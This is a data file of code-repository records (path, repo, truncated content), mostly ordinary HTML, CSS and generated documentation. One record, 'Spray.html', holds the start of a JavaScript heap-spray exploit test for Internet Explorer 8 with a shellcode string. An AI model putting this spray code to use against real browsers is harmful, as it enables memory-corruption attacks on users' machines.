path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
analyzed_libs/guava-libraries-read-only/javadoc/src-html/com/google/common/base/Service.html
jgaltidor/VarJ
<HTML> <BODY BGCOLOR="white"> <PRE> <FONT color="green">001</FONT> /*<a name="line.1"></a> <FONT color="green">002</FONT> * Copyright (C) 2009 Google Inc.<a name="line.2"></a> <FONT color="green">003</FONT> *<a name="line.3"></a> <FONT color="green">004</FONT> * Licensed under the Apache License, Version...
templates/email/reset_email.html
nikhila05/pietrack
change your password: {{ protocol}}://{{ domain }}{% url 'user:reset_confirm' uidb64=uid token=token %}
Nelson_Alvarez/Assignments/flask_fund/sur_val/templates/users.html
jiobert/python
<html> <head> <meta charset="utf-8"> <title></title> <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='user.css') }}"> </head> <body> {% with messages = get_flashed_messages() %} {% if messages %} {% for message in messages %} ...
_attachments/sparql.html
agrueneberg/Sessel
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>Sessel: SPARQL Endpoint</title> <link rel="stylesheet" href="stylesheets/bootstrap.css" /> <link rel="stylesheet" href="stylesheets/sparql.css" /> </head> <body> <div class="container"> <div cla...
fftw-src/fftw-3.3.8/doc/html/The-Discrete-Hartley-Transform.html
termoshtt/rust-fftw3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <!-- This manual is for FFTW (version 3.3.8, 24 May 2018). Copyright (C) 2003 Matteo Frigo. Copyright (C) 2003 Massachusetts Institute of Technology. Permission is granted to make and distribute verbatim cop...
training/connect-devices-wirelessly/index.html
AzureZhao/android-developer-cn
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width" /> <link rel="shortcut icon" type="image/x-icon" href="../../favicon.ico" /> <title>Connec...
example/style.css
spacemansteve/leaflet-solr-heatmap
#map { height: 600px; width: 1000px; } .leaflet-popup-content { max-height : 250px; overflow : auto; }
solr-4.10.3/docs/solr-core/org/apache/solr/update/processor/class-use/Lookup3Signature.html
71D3R/datos
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Wed Dec 10 00:36:13 EST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="utf-8"> <title>Uses of Class...
public/post/s/2017/434/index.html
kaidiren/D6
<!DOCTYPE html> <html lang="zh-Hans"> <head> <meta charset="utf-8" /> <title></title> <meta name="author" content="xli" /> <meta name="description" content="你不曾去过的城市,我不曾看过的风景,和不曾相遇的我们。" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:site" content="@gohug...
muxiwebsite/share/templates/error415.html
Muxi-Studio/muxi_site
<!DOCTYPE html> <title>415 Unsupported Media Type</title> <h1>415 Unsupported Media Type</h1> <body>对于当前请求的方法和所请求的资源,请求中提交的实体并不是服务器中所支持的格式,因此请求被拒绝。</body>
libmproxy/web/static/vendor.css
xtso520ok/mitmproxy
/*! normalize.css v3.0.2 | MIT License | git.io/normalize */ html { font-family: sans-serif; -ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%; } body { margin: 0; } article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block; } audio, canva...
test/fixtures/clay_normal/dist/index.html
rodriguezartav/clay-cli
<apex:page> <html> <head> <title>Clay Javascript Workbook</title> <link rel="stylesheet" href="./css/index.css"/> <meta charset="utf-8"/> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <link rel="canonical" href="h...
glm-0.9.2.6/doc/html/a00287.html
klantz81/ocean-simulation
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>GLM_GTX_raw_data: Raw data</title> <link href="tabs.css" rel="styleshee...
test/browser/extended/min/sugar-number.html
romancow/Sugar
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="../../stylesheets/custom.css" type="text/css" /> <link rel="stylesheet" href="../../stylesheets/tooltip.css" type="text/css" /> </head> <body> ...
watchdog_id/main/templates/users/user_form.html
watchdogpolska/watchdog-id
{% extends "base.html" %} {% load crispy_forms_tags %} {% block title %}{{ user.username }}{% endblock %} {% block content %} <h1>{{ user.username }}</h1> <form class="form-horizontal" method="post" action="{% url 'users:update' %}"> {% csrf_token %} {{ form|crispy }} <div class="contr...
src/libs/textboxio/resources/html/help/sk/accessibility.html
alexrosepizant/lescoqssoccer
<div class="ephox-polish-help-article"> <div class="ephox-polish-help-h1" role="heading" aria-level="1">Pokyny k prístupnosti</div> <div class="ephox-polish-help-h2" role="heading" aria-level="2">Aktivácia navigácie pomocou klávesnice</div> <p>Ak chcete na paneli s nástrojmi aktivovať navigáciu pomocou klávesnic...
builder/cmake/windows/doc/cmake/html/module/CTestCoverageCollectGCOV.html
pipou/rae
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>CTestCoverageCollectGCOV &mdash; CMake 3.8.1 Document...
lib/infusion/demos/uiOptions/css/uiOptions.css
dinukadesilva/music-ctrls
/* the grades and schemas Preferences Editor demos use the same css */ /* Define font families */ @font-face { font-family: Lato; src: url(../fonts/Lato-Regular.ttf); } @font-face { font-family: LatoLight; src: url(../fonts/Lato-Light.ttf); } @font-face { font-family: LatoLightItalic; src: url(../fonts/Lat...
java/doc/UseCases/MainPage.html
jhuerta6/oopregistration
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_31) on Thu Nov 17 20:03:32 MST 2016 --> <title>MainPage</title> <meta name="date" content="2016-11-17"> <link rel="stylesheet" type="text/css" ...
builds/single-file-v002/dojorama/styles/global/ui/_global/widget/PlayerWidget.css
sirprize/dojorama
.player .info {margin: 1em 0; color: #666; background: white; padding: .8em 1em; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px;}
pages/layout-7.html
Shipow/groundwork
<!DOCTYPE html><!--[if lt IE 7]><html class="no-js ie ie6 lt-ie7 lt-ie8 lt-ie9 lt-ie10"><![endif]--> <!--[if IE 7]> <html class="no-js ie ie7 lt-ie8 lt-ie9 lt-ie10"><![endif]--> <!--[if IE 8]> <html class="no-js ie ie8 lt-ie9 lt-ie10"><![endif]--> <!--[if IE 9]> <html class="no-js ie ie9 lt-ie10"><![endif]--> <!-...
apis/client/card/api_card.html
Digipalvelutehdas/APIKA
<template name="apiCard"> <div class="generic-card panel panel-default"> <div class="panel-body"> <div class="media"> <div class="media-left"> {{> viewApiLogo api=api }} </div> <div class="media-body"> <a href="{{ pathFor 'viewApi' _id=api._id }}" cla...
satori.web/satori/web/files/calendar/css/ui-hotsneaks.datepick.css
zielmicha/satori
/* ThemeRoller HotSneaks override style sheet for jQuery date picker v4.0.5. */ @import "ui.datepick.css"; .ui-widget-header a, .ui-widget-header select { color: #e1e463; /* Set (.ui-widget-header a) colour from theme here */ } .ui-widget-header a:hover { background-color: #ccd232; /* Set (.ui-state-hover) c...
css/agencyNotCompressed.css
GustafSagent/GustafSagent
/*! * Start Bootstrap - Agency v4.0.0-beta (http://startbootstrap.com/template-overviews/agency) * Copyright 2013-2017 Start Bootstrap * Licensed under MIT (https://github.com/BlackrockDigital/startbootstrap-agency/blob/master/LICENSE) */ body { overflow-x: hidden; font-family: 'Roboto Slab', 'Helvetic...
QtEsrc/qt-everywhere-opensource-src-4.8.5/doc/html/tools-inputpanel-myinputpanelform-ui.html
stephaneAG/PengPod700
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Qt 4.8: m...
docs/docsets/FormValidatorSwift.docset/Contents/Resources/Documents/Structs/NotCondition.html
ustwo/formvalidator-swift
<!DOCTYPE html> <html lang="en"> <head> <title>NotCondition Structure Reference</title> <link rel="stylesheet" type="text/css" href="../css/jazzy.css" /> <link rel="stylesheet" type="text/css" href="../css/highlight.css" /> <meta charset="utf-8"> <script src="../js/jquery.min.js" defer></script> ...
frontend/frontend2/app/views/dashboard.html
DanielGabris/radius_restserver
<div class="jumbotron"> <h1>Welcome to the usage portal!</h1> <p class="lead"> <img src="images/yeo.png" alt="I'm Yeoman"><br> </p> <p><a class="btn btn-lg btn-success" ui-sref="main.stats">Stats</a></p> </div> <div class="container"> <div class="row"> <h4>Information</h4> <p> ...
_posts/2016-10-18-helium.html
cmuellerrr/vitascope-arts
--- layout: project categories: projects client: Helium LLC client_url: client_color: video_title: "Welcome to Helium" video_id: 187911884 video_thumb: helium.jpg featured: true --- <div class="credits"> <p>Director &mdash; Cole Mueller</p> <p>Producer &mdash; Vitascope Arts</p> <p>Editor &mdash; Cole Muel...
hoi_project/apps/grappelli/templates/admin/change_form.html
pattyreinoso/voluntariadoHOI
{% extends "admin/base_site.html" %} <!-- LOADING --> {% load admin_static i18n admin_modify admin_urls grp_tags %} <!-- STYLESHEETS --> {% block stylesheets %} {{ block.super }} {% endblock %} <!-- JAVASCRIPTS --> {% block javascripts %} {{ block.super }} {% url 'admin:jsi18n' as jsi18nurl %} <scrip...
blog/blog_examples/j-v-r-example.html
bburnett86/bburnett86.github.io
<!DOCTYPE HTML> <html> <head> <link type = "text/css" rel = "stylesheet" href ="../../stylesheets/default.css"> <link type = "text/css" rel = "stylesheet" href ="../../stylesheets/blog.css"> <link type = "text/css" rel = "stylesheet" href ="../../stylesheets/examples_stylesheets/j-v-r-example.css"> <title> ...
docs/kolektivi/Sen-Ligo.html
klavs/db-lv
<!doctype html> <html lang="lv"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# profile: http://ogp.me/ns/profile#" itemscope itemtype="http://schema.org/WebSite" > <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <!-- Google ...
style.css
nhunzaker/material-design-type
/* by @liabru based on material design typography http://brm.io/material-design-type http://www.google.com/design/spec/style/typography.html */ /** * The MIT License (MIT) * * Copyright (c) 2014 Liam Brummitt * * Permission is hereby granted, free of charge, to any person obtaining a copy *...
Spray.html
idkwim/snippets
<html> <script> //test spray for IE 8 on Win7 //successfully overwrite 0c0c0c0c with shellcode //mem usage appx 210Mb padding = unescape('%u4141%u4141'); blocksize = 0xfffe0 block = '' shellcode = unescape('%u3452%u5031%u3134%u3452%u5031%u3134%u3452%u5031%u3134%u3452%u5031%u3134%u3452%u5031%u3134%u3452%u5031%u3134%u3...
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/db-4.7.25.0/docs/api_cxx/db_set_alloc.html
mollstam/UnrealPy
<!--$Id: db_set_alloc.html 63573 2008-05-23 21:43:21Z trent.nelson $--> <!--$Id: db_set_alloc.html 63573 2008-05-23 21:43:21Z trent.nelson $--> <!--Copyright (c) 1997,2008 Oracle. All rights reserved.--> <!--See the file LICENSE for redistribution information.--> <html> <head> <title>Berkeley DB: Db::set_alloc</title>...
client/node_modules/uu5g03/doc/main/server/public/data/examples/exampleUU5BricksTableTh02.html
UnicornCollege/ucl.itkpd.configurator
<!DOCTYPE html> <html> <head> <meta charset="utf-8" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1"> <!-- jQuery --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> <!-- Bootstrap --> <link rel="sty...
templates/list/category_list_m.html
bukun/maplet
{% extends "../theme/base_map.html" %} {% block head %} <title>在线地图按分类列出</title> <meta name="keywords" content="{{ catinfo.name }}地图,在线地图,历史地图,分类地图,"> <meta name="description" content="{{ catinfo.name }}地图,在线地图,历史地图,在线地图按分类列出"> {% end %} {% block show_map %} <div class="col-sm-12"> <div class="col-sm-9"> <div class...
src/styles/skins/skin-construction.css
SupasitC/Pricetrolley
a { color: #e04622; } a:hover { color: #e35938; } a:focus { color: #e35938; } a:active { color: #cc3e1d; } html .heading-primary, html .lnk-primary, html .text-color-primary { color: #e04622 !important; } html .heading.heading-primary h1, html .heading.heading-primary h2, html .heading.heading-primary h3, htm...
templates/404.html
gjreda/void
{% extends 'base.html' %} {% block title %}{{ page.title }}{% endblock %} {% block content %} <h1 class="article-title" >{{ page.title }}</h1> <div class="article-content"><p>{{ page.content }}</p></div> <hr class="large"></hr> {% for article in articles[:5] %} <h2 class="article-title pull-left"><a href="...
lib/angular/docs/examples/example-guide-concepts-1/index-production.html
ProjectGinsberg/dashboard-open
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Example - example-guide-concepts-1-production</title> <script src="//ajax.googleapis.com/ajax/libs/angularjs/1.2.17/angular.min.js"></script> </head> <body > <div ng-app ng-init="qty=1;cost=2"> <b>Invoice:</b> <div>...
doc/yaklient.objects.comment-module.html
jakesyl/Yaklient
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>yaklient.objects.comment</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /...
docs/docsets/TRON.docset/Contents/Resources/Documents/Classes/UploadAPIRequest.html
MLSDev/TRON
<!DOCTYPE html> <html lang="en"> <head> <title>UploadAPIRequest Class Reference</title> <link rel="stylesheet" type="text/css" href="../css/jazzy.css" /> <link rel="stylesheet" type="text/css" href="../css/highlight.css" /> <meta charset="utf-8"> <script src="../js/jquery.min.js" defer></script> ...
src/index.html
alistaircolling/gulpfile-example
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Example</title> <link rel="stylesheet" href="css/main.css"> <link rel="shortcut icon" href="imgs/favicon.ico...
third-party/src/boost_1_56_0/libs/numeric/ublas/doc/doxyfiles/html/search/all_6c.html
rkq/cxxexp
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="search...
docs/docsets/SwiftPhoenixClient.docset/Contents/Resources/Documents/Structs/ChannelEvent.html
davidstump/SwiftPhoenixClient
<!DOCTYPE html> <html lang="en"> <head> <title>ChannelEvent Structure Reference</title> <link rel="stylesheet" type="text/css" href="../css/jazzy.css" /> <link rel="stylesheet" type="text/css" href="../css/highlight.css" /> <meta charset='utf-8'> <script src="../js/jquery.min.js" defer></script> ...
src/app/indexrouting.html
ikosenn/ng-book
<!DOCTYPE html> <html ng-app="app.routes"> <head> <title>Routing Angular</title> </head> <body> <p>Hello</p> <div ng-view></div> <script src="../../bower_components/angular/angular.min.js"></script> <script src="../../bower_components/angular-route/angular-route.min.js"></script> ...
public/stylesheets/active_admin.css
mpbod/banknotes
span.icon { vertical-align: middle; display: inline-block; } span.icon svg { vertical-align: baseline; } span.icon { width: 0.8em; height: 0.8em; } span.icon svg { width: 0.8em; height: 0.8em; } /* Active Admin CSS */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote...
index.html
AmetAlvirde/polymer-cpco7
<!-- Ésta es la página web donde consumieremos nuestro elemento personalizado. Aquí debemos llamar el script "Platfrom. Quien se encarga de "nivelar" las capacidades de todos los navegadores y de esta forma satisfacer una de las principales metas del proyecto: La compatibilidad. --> <!DOCTYPE html> <h...
test/fixtures/partial.html
philippsimon/grunt-static-inline
<p>A template could be loaded and injected here.</p>
irm/docs/code/Information Resource Manager/_users_knowledgebase-detail_php.html
cerad/appirm
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>Docs for page knowledgebase-detail.ph...
third_party/zeromq-4.0.3/doc/zmq_z85_encode.html
kjdev/zmq-tools
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="application/xhtml+xml; charset=UTF-8" /> <meta name="generator" content="AsciiDoc 8.6.7" /> <title>zmq_z85...
aio/content/examples/what-is-angular/src/app/hello-world-bindings/hello-world-bindings.component.html
alxhub/angular
<!-- #docregion event-binding --> <button (click)="sayMessage()" [disabled]="canClick">Trigger alert message</button> <!-- #enddocregion --> <!-- #docregion bindings --> <p [id]="sayHelloId" [style.color]="fontColor">You can set my color in the component!</p> <!-- #enddocregion -->
docs/classes/viewmodels_edititemviewmodel_.edititemviewmodel.html
rLoka/OfficeEquipmentTracker
<!doctype html> <html class="default no-js"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>EditItemViewModel | Office Equipment Tracker - Generated documentation</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scal...
Documentation/html/namespacecivilsage__1__1admin_8html_source.html
amarjeetkapoor1/CivilOctave
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
app/dist/views/error/error500.view.html
metricAppTeam/metricapp-client
<!-- COMPONENT: 500 --> <div ng-controller="Error500Controller as vm"> <div class="error-container"> <div class="error-code">500</div> <div class="error-text">internal server error</div> <div class="error-subtext">The server encountered an internal error or misconfiguration and was unable to...
naive_bayes/non_course_test/untag_http:^^www.cs.wisc.edu^~xuelin^xuelin.html
ML-SWAT/Web2KnowledgeBase
Xuelin Lu's Home Page Felix the cat! I'm a character who was created in 1919 by Otto Messmer. I was the very first based on an animal but with a human personality. My first feature was Felix Saves the Day, which was shown in 1922. I was one of the most famous stars of the 1920, rivaling Chaplin and...
lib/Log4net 1.2.13/doc/release/sdk/log4net.Appender.TextWriterAppender.WriteFooter.html
YOTOV-LIMITED/pokerleaguemanager
<html dir="LTR"> <head> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1252" /> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" /> <title>TextWriterAppender.WriteFooter Method</title> <xml> </xml> <link rel="stylesheet" type="text/css" ...
NetworkEvents/www/index.html
vipulshah2010/CORDOVA_5.0_Programs
<!DOCTYPE html> <html> <head> <title>Hello Cordova 1</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta name="viewport" id="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <link rel="stylesheet" type="text/css" hr...
web/bundles/wein/node_modules/node-sass/test/fixtures/spec/spec/scss-tests/139_test_at_root_in_bubbled_media/input.css
Schulprojekt-Weinverwaltung/wein
@media screen { .bar { a: b; } } /*# sourceMappingURL=input.css.map */
src/app/note/content-box.html
hikari77/ngblog
<div class="content-box"> <div class="content-box-head">{{note.modified_time | date}}</div> <div contenteditable="true" class="content-box-cell"> <p>{{note.content}}</p> </div> </div>
manual/zh/post-processing.html
looeee/three.js
<!DOCTYPE html><html lang="zh"><head> <meta charset="utf-8"> <title>后期处理</title> <meta name="viewport" content="width=device-width, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@threejs"> <met...
frontend/themes/response5/core/layout/css/screen.css
diannereyno/fork_macarey
/* response theme for fork cms author: Simon Coudeville version: 1.0 CONTENTS: 1. CSS Resets 2. Type & image presets 3. Grid 4. Design 5. Media Queries */ /* 1. CSS Resets -------------------------------------- */ html,body,div,col,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,address,cite,code,del...
public/vendor/jquery-ui/themes/base/spinner.css
fortunearterial/laravel-pjss
/*! * jQuery UI Spinner 1.12.0 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/spinner/#theming */ .ui-spinner { position: relative; display: inline-block; overflow: hidden; ...
template/files/pages/form_controls.html
alicankustemur/neptun_b2b
<!DOCTYPE html> <!-- Template Name: Metronic - Responsive Admin Dashboard Template build with Twitter Bootstrap 3.3.4 Version: 4.0.2 Author: KeenThemes Website: http://www.keenthemes.com/ Contact: support@keenthemes.com Follow: www.twitter.com/keenthemes Like: www.facebook.com/keenthemes Purchase: http://themeforest.n...
template/first/portfolio.html
superbay/portfolio
<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <title>Portfolio</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="keywords" content=""> ...
node_apidoc/timers.html
luisTJ/nodeschool_learnyounode_solution
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Timers Node.js v0.10.24 Manual &amp; Documentation</title> <link rel="stylesheet" href="assets/style.css"> <link rel="stylesheet" href="assets/sh.css"> <link rel="canonical" href="http://nodejs.org/api/timers.html"> </head> <body class="alt...
Dots-TweenMax/com/greensock/docs/com/greensock/TweenLite.html
gumgl/flash
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="../../style.css" type="text/css" media="screen"> <link rel="stylesheet" href="../../print.css" type="text/...
rawdata/utf8_lawstat/version2/04534/0453496112100.html
g0v/laweasyread-data
<html> <META HTTP-EQUIV=Content-Type Content="text/html; charset=utf8"> <!-- Mirrored from lis.ly.gov.tw/lghtml/lawstat/version2/04534/0453496112100.htm by HTTrack Website Copier/3.x [XR&CO'2010], Sun, 24 Mar 2013 09:23:43 GMT --> <head><title>法編號:04534 版本:096112100</title> <link rel="stylesheet" type="text/css" href=...
client/src/app/routes/user/list/list.component.html
TypeScriptUsersDE/homepage
<section id="list" class="gray-bg-spacer"> <div class="container"> <div class="row head"> <div class="col-md-12"> <h1 class="text-orange underline">TypeScript Entwickler</h1> <div class="row list-control-row"> <div class="col-lg-1 col-md-6 col-sm-5 col-xs-12 list-control nav"> ...
src/common/components/topic-container/reply-action-bar.css
react-prefer/hacker-reader
.replyActionBarContainer { position: fixed; bottom: 0; left: 0; width: 100%; border-top: 1px solid #eee; background-color: #f6f7f8; display: flex; justify-content: space-between; align-items: center; } .replyHint { margin: 9px 0 9px 12px; min-height: 28px; background: w...
templates/upload.html
hyper-xx/flask-web
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>flask upload</title> </head> <body> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="the_file"> <input type="submit" value="Upload"> </form> </body> </html>
hadoop-2.2.0/share/doc/hadoop/api/org/apache/hadoop/log/metrics/package-tree.html
ashish-17/playback
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_26) on Mon Oct 07 06:41:27 UTC 2013 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> org.apache.hadoop.log.metrics Cla...
www/jiwa/map.html
cepatsembuh/cordova
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="../bower_components/milligram/dist/milligram.min.css"> <link rel="stylesheet" href="../css/style.css"> <link rel="stylesheet" href="../fonts/icons/css/fon...
widgets/imagecarousel/imagecarousel.html
jasontbradshaw/far-more-dashboard-2014
<!-- if nothing is here, rendering is skipped :/ -->
QtEsrc/qt-everywhere-opensource-src-4.8.5/doc/html/demos-deform.html
stephaneAG/PengPod700
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- deform.qdoc -...
build/unbundled/bower_components/iron-demo-helpers/demo-pages-shared-styles.html
lflee/lflee.github.io
<html><head><link rel="import" href="../polymer/polymer.html"> <link rel="import" href="../iron-flex-layout/iron-flex-layout.html"> <link rel="import" href="../paper-styles/color.html"> <link rel="import" href="../paper-styles/typography.html"> <link rel="import" href="../paper-styles/shadow.html"> </head><body><dom-...
importexport/templates/importexport/export.html
ampafdv/ampadb
{% extends "menu.html" %} {% load urllink %} {% load bootstrap3 %} {% load static_dbg %} {% block styles %} {{ block.super }} <style> #contrasenya, label[for="contrasenya"] { display: none; } #repeteix_la_contrasenya, label[for="repeteix_la_contrasenya"] { display: none; } </style> {% endblock sty...
_site/2018/03/15/jni2.html
luofengliuchen/luofengliuchen.github.io-master
<!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <!--[if lte IE 9]><meta http-equiv="refresh" content="0;url=/ie.html"><![endif]--> <title>JNI常见问题(问题查询笔记...
backend/normal/Tisa/tasks_today.html
newset/theme
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Tisa Admin Template v1.1 (tasks_today)</title> <meta name="viewport" content="initial-scale=1.0,maximum-scale=1.0,user-scalable=no"> <link rel="shortcut icon" href="favicon.ico" /> <!-- bootstrap framework --> <link href="assets/bootstrap...
linux-3.1.9/drivers/usb/host/dwc_otg/doc/html/dwc__otg__pcd__intr_8c.html
sahdman/rpi_android_kernel
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>DesignWare USB 2.0 OTG Controller (DWC_otg) Device Driver: dwc_otg_pcd_intr.c File Reference</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link...
docs/docs/docsets/Stripe.docset/Contents/Resources/Documents/Enums/STPPaymentIntentCaptureMethod.html
stripe/stripe-ios
<!DOCTYPE html> <html lang="en"> <head> <title>STPPaymentIntentCaptureMethod Enumeration Reference</title> <link rel="stylesheet" type="text/css" href="../css/jazzy.css" /> <link rel="stylesheet" type="text/css" href="../css/highlight.css" /> <meta charset="utf-8"> <script src="../js/jquery.min.js...
examples/gen/only-countries-europe.html
jshanson7/intl-tel-input
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Example: European countries</title> <link rel="stylesheet" href="../css/prism.css"> <link rel="stylesheet" href="../../build/css/intlTelInput.css?1394691216932"> <link rel="stylesheet" href="../../build/css/demo.css?1394691216932"> ...
examples/webgl2_volume_instancing.html
looeee/three.js
<!DOCTYPE html> <html lang="en"> <head> <title>three.js webgl2 - volume - instancing</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0"> <link type="text/css" rel="stylesheet" href="main.css"> </head> <body> <div id="in...
app/views/search-llc/v4-4/thank-you.html
LandRegistry/llc-prototype
{% extends "layout_citizen_regular.html" %} {% block page_title %} Search for a charge {% endblock %} {% block content %} <main id="content"> <div class="phase-banner-beta"> <p> <strong class="phase-tag">BETA</strong> <span>This is a new service – your <a href="../../feedback">feedb...
api/v0.10.0/dash/graphics/adapters/win32gl/Adapter.height.html
Circular-Studios/Dash-Docs
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"/><!-- using block title in layout.dt--><!-- using block ddox.defs in ddox.layout.dt--><!-- using block ddox.title in ddox.layout.dt--> <title>Adapter.height - multiple declarations</title> <link rel="stylesheet" type="text/css" href="../../../../styles/ddox.cs...
client/views/admin/pages/new_page.html
ndemoreau/azimuth-core
<template name="new_page"> <h1>New Page</h1> <form class="form-horizontal" id="newPageForm"> <label for="title">Title</label> <input type="text" class="new-page-title" name="title" placeholder="Page Title"> <label for="title">Slug</label> <input type="text" class="new-page-slug" name="slug" placeho...
storefront/special-orders.html
BrieMurphy/BrieMurphy.github.io
